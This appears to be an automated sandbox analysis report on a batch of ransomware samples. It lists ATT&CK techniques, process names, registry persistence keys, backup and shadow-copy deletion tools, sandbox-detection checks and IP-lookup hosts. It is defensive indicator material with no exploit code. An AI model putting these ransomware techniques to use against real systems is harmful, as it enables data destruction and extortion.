chaos | 3cbc2e715a7f27f27bfc07e4fed45251608833ae05020fde0d06e8f1187dbe11

pid	Process
7764	bcdedit.exe
6892	bcdedit.exe
7116	bcdedit.exe
1040	bcdedit.exe
8244	bcdedit.exe
6688	bcdedit.exe

Deletes backup catalog 3 TTPs 3 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

pid	Process
8116	wbadmin.exe
9084	wbadmin.exe
5516	wbadmin.exe

Modifies Windows Firewall 2 TTPs 3 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5240	netsh.exe
7872	netsh.exe
5136	netsh.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.Win32.Blocker.pef-fe7a1ab408346a306d7b81a042152d90006af403c7ca544fb6ae789a8ce27c0a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Blocker.gen-2675562fe96bd7f22b201128e472ea918bc8b0df59d9076b988976443a59b1d2.exe

Executes dropped EXE 22 IoCs

pid	Process
2296	HEUR-Trojan-Ransom.MSIL.Agent.gen-aa438f22db488466ed39153b302b4f7557ca4bcc44ba35f83ad2dc8a04903398.exe
2480	HEUR-Trojan-Ransom.MSIL.Blocker.gen-2675562fe96bd7f22b201128e472ea918bc8b0df59d9076b988976443a59b1d2.exe
3128	HEUR-Trojan-Ransom.MSIL.Blocker.gen-86957c2e724e7b84d44e4178332d1def2566555a2a5da52d626aab14390501d8.exe
3452	HEUR-Trojan-Ransom.MSIL.Encoder.gen-ad5630847e8a067731faf537bbadd32a0acaa25671eec69e65027545ded0b43b.exe
3380	HEUR-Trojan-Ransom.Win32.Agent.gen-d96ea612f5aa6881f1dba09133359a0877704eb90f9ae09c9aab1d4eaaa91b99.exe
4244	HEUR-Trojan-Ransom.Win32.Blocker.pef-fe7a1ab408346a306d7b81a042152d90006af403c7ca544fb6ae789a8ce27c0a.exe
3524	HEUR-Trojan-Ransom.Win32.Convagent.gen-825584b89f42e9221dfc7e8ee83ce97a66a37037ce2443d94f821b1d4e642ab9.exe
1464	zbhnd.exe
4468	encrypter.exe
4280	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-904298457f2a446a17c4a814cc7e1a99aec2583880e8ab87b80c94d1c5651c46.exe
1152	HEUR-Trojan-Ransom.Win32.Cryptoff.vho-d22fc7bb9213b6d98569496cbc13cd2e9ba938c39b006f1749478d301e4168b6.exe
4236	33A2E4F0.exe
1444	HEUR-Trojan-Ransom.Win32.Encoder.gen-5864609f7f73c991b178fc8a992d47c10e726ba72bcb2e5acf8d169c23e35629.exe
2600	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
4936	HEUR-Trojan-Ransom.Win32.Phobos.vho-eb740005273c087baf42b0c3a49a7c5b7225256681106c72567db92fc2048ada.exe
1432	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-29e569d4aa866298a648f73a57d87b0f5d3676f9ececf71ff91b5083ffe6556d.exe
2644	HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe
3228	HEUR-Trojan-Ransom.Win32.Stop.gen-859151b76cfbabf082e3b4ff1d9c42406e29c993ad4fb0c3b23d632719633791.exe
1132	HEUR-Trojan-Ransom.Win32.Phobos.vho-eb740005273c087baf42b0c3a49a7c5b7225256681106c72567db92fc2048ada.exe
2560	HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe
5928	HEUR-Trojan-Ransom.Win32.Stop.gen-de8f146808af12f7a609b39c56cf46d9d204ef2e717ff5b83422b7d7deb34739.exe
6072	HEUR-Trojan-Ransom.Win32.Stop.gen-f205ae05f0212e1b0f4328dde8202d00ccd26b250d8b90dd64cbc00505c75ea1.exe

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3704	icacls.exe
6552	icacls.exe
7208	icacls.exe
6304	icacls.exe

Uses the VBS compiler for execution 1 TTPs

Command and Scripting Interpreter
T1059

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\{7C046CF8-759C-4301-A95C-2D5FD8AD23DE} = "C:\\ProgramData\\{1D7BD5EC-1EA9-44E8-9114-08DDFBD26AB9}\\33A2E4F0.exe"	HEUR-Trojan-Ransom.Win32.Convagent.gen-825584b89f42e9221dfc7e8ee83ce97a66a37037ce2443d94f821b1d4e642ab9.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{7C046CF8-759C-4301-A95C-2D5FD8AD23DE} = "C:\\ProgramData\\{1D7BD5EC-1EA9-44E8-9114-08DDFBD26AB9}\\33A2E4F0.exe"	HEUR-Trojan-Ransom.Win32.Convagent.gen-825584b89f42e9221dfc7e8ee83ce97a66a37037ce2443d94f821b1d4e642ab9.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\igorqozkcns = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\agrplk.exe\""	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tm3rbc5fz4 = "C:\\Users\\Admin\\Desktop\\00464\\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-d22fc7bb9213b6d98569496cbc13cd2e9ba938c39b006f1749478d301e4168b6.exe"	HEUR-Trojan-Ransom.Win32.Cryptoff.vho-d22fc7bb9213b6d98569496cbc13cd2e9ba938c39b006f1749478d301e4168b6.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4584	powershell.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\Z:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\E:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\H:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\I:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\T:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\U:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\K:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\R:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\X:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\Y:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\W:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\A:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\G:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\M:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\O:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\V:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\Q:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\S:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\B:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\J:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\L:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\N:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
File opened (read-only)	\??\P:	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
45	iplogger.org
46	iplogger.org

Looks up external IP address via web service 9 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
37	api.2ip.ua
38	api.2ip.ua
86	api.2ip.ua
95	api.2ip.ua
58	api.2ip.ua
59	api.2ip.ua
82	api.2ip.ua
114	api.ipify.org
115	api.ipify.org

Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.

Proxy
T1090

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\HelpMe.exe	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-29e569d4aa866298a648f73a57d87b0f5d3676f9ececf71ff91b5083ffe6556d.exe
File opened for modification	C:\Windows\SysWOW64\HelpMe.exe	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-29e569d4aa866298a648f73a57d87b0f5d3676f9ececf71ff91b5083ffe6556d.exe
File created	C:\Windows\SysWOW64\notepad.exe.exe	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-29e569d4aa866298a648f73a57d87b0f5d3676f9ececf71ff91b5083ffe6556d.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2644 set thread context of 2560	2644	HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe	131

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023ca1-189.dat	upx
behavioral1/memory/4280-190-0x0000000000400000-0x00000000005BB000-memory.dmp	upx
behavioral1/files/0x0007000000023d09-423.dat	upx
behavioral1/files/0x0007000000023d07-419.dat	upx
behavioral1/memory/4280-1198-0x0000000000400000-0x00000000005BB000-memory.dmp	upx
behavioral1/memory/4280-1625-0x0000000000400000-0x00000000005BB000-memory.dmp	upx
behavioral1/memory/5832-11189-0x0000000000400000-0x0000000000487000-memory.dmp	upx
behavioral1/memory/5832-14915-0x0000000000400000-0x0000000000487000-memory.dmp	upx

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File created	C:\Program Files\7-Zip\7-zip.dll.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-904298457f2a446a17c4a814cc7e1a99aec2583880e8ab87b80c94d1c5651c46.exe
File created	C:\Program Files (x86)\Internet Explorer\iexplore.exe.exe	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-29e569d4aa866298a648f73a57d87b0f5d3676f9ececf71ff91b5083ffe6556d.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-904298457f2a446a17c4a814cc7e1a99aec2583880e8ab87b80c94d1c5651c46.exe
File created	C:\Program Files\7-Zip\7-zip.chm.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-904298457f2a446a17c4a814cc7e1a99aec2583880e8ab87b80c94d1c5651c46.exe
File created	C:\Program Files\7-Zip\7-zip.dll	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-904298457f2a446a17c4a814cc7e1a99aec2583880e8ab87b80c94d1c5651c46.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
9016	sc.exe
6336	sc.exe
4960	sc.exe
8064	sc.exe
8304	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0007000000023d04-412.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5204	3524	WerFault.exe	107

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-2675562fe96bd7f22b201128e472ea918bc8b0df59d9076b988976443a59b1d2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Blocker.pef-fe7a1ab408346a306d7b81a042152d90006af403c7ca544fb6ae789a8ce27c0a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Encoder.gen-5864609f7f73c991b178fc8a992d47c10e726ba72bcb2e5acf8d169c23e35629.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	33A2E4F0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	encrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Convagent.gen-825584b89f42e9221dfc7e8ee83ce97a66a37037ce2443d94f821b1d4e642ab9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Agent.gen-d96ea612f5aa6881f1dba09133359a0877704eb90f9ae09c9aab1d4eaaa91b99.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zbhnd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Stop.gen-de8f146808af12f7a609b39c56cf46d9d204ef2e717ff5b83422b7d7deb34739.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-29e569d4aa866298a648f73a57d87b0f5d3676f9ececf71ff91b5083ffe6556d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Phobos.vho-eb740005273c087baf42b0c3a49a7c5b7225256681106c72567db92fc2048ada.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Stop.gen-13fef99c7a31d0ed294fcbf75f459c5ccece4fc5ce2de3931f592489f169b80d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Stop.gen-859151b76cfbabf082e3b4ff1d9c42406e29c993ad4fb0c3b23d632719633791.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
852	cmd.exe
6724	PING.EXE

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	HEUR-Trojan-Ransom.Win32.GandCrypt.pef-74bddd6acfe0f9ccda62ce240de1e08581b5b9fd1df07da6085eec08856c04a3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	HEUR-Trojan-Ransom.Win32.Stop.gen-859151b76cfbabf082e3b4ff1d9c42406e29c993ad4fb0c3b23d632719633791.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	HEUR-Trojan-Ransom.Win32.Stop.gen-859151b76cfbabf082e3b4ff1d9c42406e29c993ad4fb0c3b23d632719633791.exe

Interacts with shadow copies 3 TTPs 3 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

Direct Volume Access

T1006

pid	Process
4504	vssadmin.exe
8016	vssadmin.exe
6208	vssadmin.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
4872	taskkill.exe
5968	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	cmd.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
5844	notepad.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
6724	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1500	powershell.exe
1500	powershell.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2284	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeRestorePrivilege	432	7zFM.exe
Token: 35	432	7zFM.exe
Token: SeSecurityPrivilege	432	7zFM.exe
Token: SeDebugPrivilege	1500	powershell.exe
Token: SeDebugPrivilege	2004	taskmgr.exe
Token: SeSystemProfilePrivilege	2004	taskmgr.exe
Token: SeCreateGlobalPrivilege	2004	taskmgr.exe
Token: SeDebugPrivilege	2284	taskmgr.exe
Token: SeSystemProfilePrivilege	2284	taskmgr.exe
Token: SeCreateGlobalPrivilege	2284	taskmgr.exe
Token: 33	2004	taskmgr.exe
Token: SeIncBasePriorityPrivilege	2004	taskmgr.exe
Token: SeDebugPrivilege	2296	HEUR-Trojan-Ransom.MSIL.Agent.gen-aa438f22db488466ed39153b302b4f7557ca4bcc44ba35f83ad2dc8a04903398.exe
Token: SeDebugPrivilege	3128	HEUR-Trojan-Ransom.MSIL.Blocker.gen-86957c2e724e7b84d44e4178332d1def2566555a2a5da52d626aab14390501d8.exe
Token: SeDebugPrivilege	3380	HEUR-Trojan-Ransom.Win32.Agent.gen-d96ea612f5aa6881f1dba09133359a0877704eb90f9ae09c9aab1d4eaaa91b99.exe
Token: SeDebugPrivilege	3452	HEUR-Trojan-Ransom.MSIL.Encoder.gen-ad5630847e8a067731faf537bbadd32a0acaa25671eec69e65027545ded0b43b.exe
Token: SeDebugPrivilege	1572	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
432	7zFM.exe
432	7zFM.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2004	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2004	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2004	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe
2284	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2040	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1500 wrote to memory of 4580	1500	powershell.exe	97
PID 1500 wrote to memory of 4580	1500	powershell.exe	97
PID 2004 wrote to memory of 2284	2004	taskmgr.exe	99
PID 2004 wrote to memory of 2284	2004	taskmgr.exe	99
PID 4580 wrote to memory of 2296	4580	cmd.exe	100
PID 4580 wrote to memory of 2296	4580	cmd.exe	100
PID 4580 wrote to memory of 2480	4580	cmd.exe	101
PID 4580 wrote to memory of 2480	4580	cmd.exe	101
PID 4580 wrote to memory of 2480	4580	cmd.exe	101
PID 4580 wrote to memory of 3128	4580	cmd.exe	102
PID 4580 wrote to memory of 3128	4580	cmd.exe	102
PID 4580 wrote to memory of 3452	4580	cmd.exe	103
PID 4580 wrote to memory of 3452	4580	cmd.exe	103
PID 4580 wrote to memory of 3380	4580	cmd.exe	105
PID 4580 wrote to memory of 3380	4580	cmd.exe	105
PID 4580 wrote to memory of 3380	4580	cmd.exe	105
PID 4580 wrote to memory of 4244	4580	cmd.exe	106
PID 4580 wrote to memory of 4244	4580	cmd.exe	106
PID 4580 wrote to memory of 4244	4580	cmd.exe	106
PID 4580 wrote to memory of 3524	4580	cmd.exe	107
PID 4580 wrote to memory of 3524	4580	cmd.exe	107
PID 4580 wrote to memory of 3524	4580	cmd.exe	107
PID 4244 wrote to memory of 1464	4244	HEUR-Trojan-Ransom.Win32.Blocker.pef-fe7a1ab408346a306d7b81a042152d90006af403c7ca544fb6ae789a8ce27c0a.exe	110
